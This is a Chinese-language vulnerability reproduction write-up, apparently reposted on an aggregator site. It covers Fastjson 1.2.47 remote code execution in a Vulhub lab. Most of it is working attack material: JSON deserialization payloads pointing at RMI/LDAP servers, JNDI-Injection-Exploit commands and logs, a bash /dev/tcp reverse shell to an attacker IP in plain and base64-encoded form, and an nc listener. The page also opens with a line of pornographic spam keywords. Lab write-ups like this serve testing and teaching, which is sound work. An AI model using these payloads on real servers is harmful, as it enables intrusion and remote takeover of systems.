国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【漏洞復現(xiàn)】Fastjson_1.2.47_rce

這篇具有很好參考價值的文章主要介紹了【漏洞復現(xiàn)】Fastjson_1.2.47_rce。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

感謝互聯(lián)網(wǎng)提供分享知識與智慧,在法治的社會里,請遵守有關(guān)法律法規(guī)

說明 內(nèi)容
漏洞編號
漏洞名稱 Fastjson_1.2.47_遠程執(zhí)行漏洞
漏洞評級
影響范圍
漏洞描述
修復方案

1.1、漏洞描述

Fastjson是阿里巴巴公司開源的一款json解析器,其性能優(yōu)越,被廣泛應用于各大廠商的Java項目中。fastjson于1.2.24版本后增加了反序列化白名單,而在1.2.48以前的版本中,攻擊者可以利用特殊構(gòu)造的json字符串繞過白名單檢測,成功執(zhí)行任意命令

1.2、漏洞等級

高危

1.3、影響版本

1.2.47

1.4、漏洞復現(xiàn)

1、基礎(chǔ)環(huán)境

Path:Vulhub/fastjson/1.2.47-rce


啟動測試環(huán)境:

sudo docker-compose up -d

訪問http://your-ip:8090/即可看到一個json對象被返回

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

將content-type修改為application/json后可向其POST新的JSON對象,后端會利用fastjson進行解析

發(fā)送測試數(shù)據(jù):

{"name":"hello", "age":20}

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

2、漏洞檢測

使用BurpSuite擴展插件FastjsonScan進行漏洞檢測

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

POC:

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://s0tgwxk05ll1qvmz0lwr27u0prvhj6.oastify.com/aaa",
        "autoCommit":true
    }
}

使用dnslog測試

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

3、漏洞驗證

利用JNDI-Injection-Exploit工具開啟RMI服務器

/tmp目錄下創(chuàng)建hello文件

┌──(kali?kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/demo" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> touch /tmp/demo
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fuk3fq
ldap://192.168.80.141:1389/fuk3fq
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/slgipa
ldap://192.168.80.141:1389/slgipa
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/zsjp7n

----------------------------Server Log----------------------------
2023-09-08 03:53:56 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 03:53:56 [RMISERVER]  >> Listening on 0.0.0.0:1099
2023-09-08 03:53:57 [LDAPSERVER] >> Listening on 0.0.0.0:1389

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

發(fā)送POC到FastJson服務器,通過RMI協(xié)議遠程加載惡意類

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.80.141:1099/slgipa",
        "autoCommit":true
    }
}

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

進入docker容器內(nèi)驗證:

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

1.5、深度利用

1、反彈Shell

構(gòu)造反彈shell,進行base64編碼

bash -i >& /dev/tcp/192.168.80.141/1234 0>&1

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

監(jiān)聽1234端口

nc -lvp 1234

開啟RMI服務

┌──(kali?kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fd5cfs
ldap://192.168.80.141:1389/fd5cfs
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/flbdik
ldap://192.168.80.141:1389/flbdik
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/m8yxp6

----------------------------Server Log----------------------------
2023-09-08 04:02:36 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 04:02:36 [RMISERVER]  >> Listening on 0.0.0.0:1099
2023-09-08 04:02:36 [LDAPSERVER] >> Listening on 0.0.0.0:1389

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

POC:

{
    "axin":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "is":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.141:1389/fd5cfs",
        "autoCommit":true
    }
}

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)

獲得Shell

【漏洞復現(xiàn)】Fastjson_1.2.47_rce,# 漏洞復現(xiàn),漏洞復現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-743792.html

到了這里,關(guān)于【漏洞復現(xiàn)】Fastjson_1.2.47_rce的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • ThinkPHP 多語言模塊RCE漏洞復現(xiàn)

    ThinkPHP 多語言模塊RCE漏洞復現(xiàn)

    ThinkPHP,是為了簡化企業(yè)級應用開發(fā)和敏捷WEB應用開發(fā)而誕生的開源輕量級PHP框架。最早誕生于2006年初,2007年元旦正式更名為ThinkPHP,并且遵循Apache2開源協(xié)議發(fā)布。ThinkPHP從誕生以來一直秉承簡潔實用的設計原則,在保持出色的性能和至簡的代碼的同時,也注重易用性。并且

    2023年04月22日
    瀏覽(26)
  • Fastjson反序列化漏洞原理與復現(xiàn)

    Fastjson是java的一個庫,可以將Java對象轉(zhuǎn)化為json格式的字符串,也可以將json格式的字符串轉(zhuǎn)化為Java對象。 Fastjson提供了 toJSONString() 和 parseObject() 方法來將Java對象與JSON相互轉(zhuǎn)換。調(diào)用 toJSONString() 方法即可將對象轉(zhuǎn)換成 JSON 字符串, parseObject() 方法則反過來將JSON字符串轉(zhuǎn)換成

    2024年02月12日
    瀏覽(39)
  • 漏洞復現(xiàn)-docker-unauthorized-rce

    漏洞復現(xiàn)-docker-unauthorized-rce

    目錄 一、漏洞介紹 1.1漏洞成因 2.2環(huán)境準備 二、漏洞檢測 三、漏洞利用 1.腳本利用 2.定時任務反彈shell 3. 寫ssh公鑰獲取shell 1.1漏洞成因 ? ? ? ? docker remote API未授權(quán)訪問漏洞,此API主要目的是取代命令執(zhí)行頁面,開放2375監(jiān)聽容器時,會調(diào)用這個API。方便docker集群管理和擴展

    2024年02月09日
    瀏覽(35)
  • 銳捷EWEB網(wǎng)管系統(tǒng) RCE漏洞復現(xiàn)

    銳捷EWEB網(wǎng)管系統(tǒng) RCE漏洞復現(xiàn)

    ? 銳捷網(wǎng)管系統(tǒng)是由北京銳捷數(shù)據(jù)時代科技有限公司開發(fā)的新一代基于云的網(wǎng)絡管理軟件,以“數(shù)據(jù)時代創(chuàng)新網(wǎng)管與信息安全”為口號,定位于終端安全、IT運營及企業(yè)服務化管理統(tǒng)一解決方案。 ? Ruijie-EWEB 網(wǎng)管系統(tǒng) flwo.control.php 中的 type 參數(shù)存在命令執(zhí)行漏洞,攻擊者可利

    2024年02月03日
    瀏覽(22)
  • Hessian 反序列化RCE漏洞復現(xiàn)

    Hessian 反序列化RCE漏洞復現(xiàn)

    ? ? ?Hessian是二進制的web service協(xié)議,官方對Java、Flash/Flex、Python、C++、.NET C#等多種語言都進行了實現(xiàn)。Hessian和Axis、XFire都能實現(xiàn)web service方式的遠程方法調(diào)用,區(qū)別是Hessian是二進制協(xié)議,Axis、XFire則是SOAP協(xié)議,所以從性能上說Hessian遠優(yōu)于后兩者,并且Hessian的JAVA使用方法非

    2024年02月11日
    瀏覽(35)
  • ThinkPHP 3.2.x RCE漏洞復現(xiàn)

    ThinkPHP 3.2.x RCE漏洞復現(xiàn)

    ThinkPHP3.2遠程代碼執(zhí)行漏洞,該漏洞產(chǎn)生原因是由于在業(yè)務代碼中如果對模板賦值方法assign的第一個參數(shù)可控,則導致模板路徑變量被覆蓋為攜帶攻擊代碼路徑,造成文件包含,代碼執(zhí)行等危害。 復現(xiàn)環(huán)境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10 一、 搭建環(huán)境: 在ThinkPHP的

    2023年04月08日
    瀏覽(21)
  • CVE -2022-26134漏洞復現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個專業(yè)的企業(yè)知識管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識庫并建立知識管理流程,也可以用于構(gòu)建企業(yè)wiki。其使用簡單,但它強大的編輯和站點管理特征能夠幫助團隊成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • CVE漏洞復現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞復現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一個基礎(chǔ)開源框架,其目的是用于簡化 Java 企業(yè)級應用的開發(fā)難度和開發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報告,Spring Framework存在遠程代碼執(zhí)行漏洞,在 JDK 9+ 上運行的 Spring MVC 或 Spring WebFlux 應用程序可能容易受到通過數(shù)據(jù)綁定的遠程代碼執(zhí)行

    2023年04月21日
    瀏覽(26)
  • IP-guard WebServer RCE漏洞復現(xiàn)

    ? ?IP-guard是由溢信科技股份有限公司開發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護終端設備安全、數(shù)據(jù)安全、管理網(wǎng)絡使用和簡化IT系統(tǒng)管理。 ?漏洞成因 ? ? 在Web應用程序的實現(xiàn)中,參數(shù)的處理和驗證是確保應用安全的關(guān)鍵環(huán)節(jié)。然而,當參數(shù)處理不當時,就會出現(xiàn)安

    2024年02月05日
    瀏覽(22)
  • Apache ActiveMQ RCE漏洞復現(xiàn)(CNVD-2023-69477)

    Apache ActiveMQ RCE漏洞復現(xiàn)(CNVD-2023-69477)

    ??ActiveMQ是一個開源的消息代理和集成模式服務器,它支持Java消息服務(JMS) API。它是Apache Software Foundation下的一個項目,用于實現(xiàn)消息中間件,幫助不同的應用程序或系統(tǒng)之間進行通信。 ?Apache ActiveMQ 中存在遠程代碼執(zhí)行漏洞,Apache ActiveMQ在默認安裝下開放了61616服務端口,

    2024年02月08日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包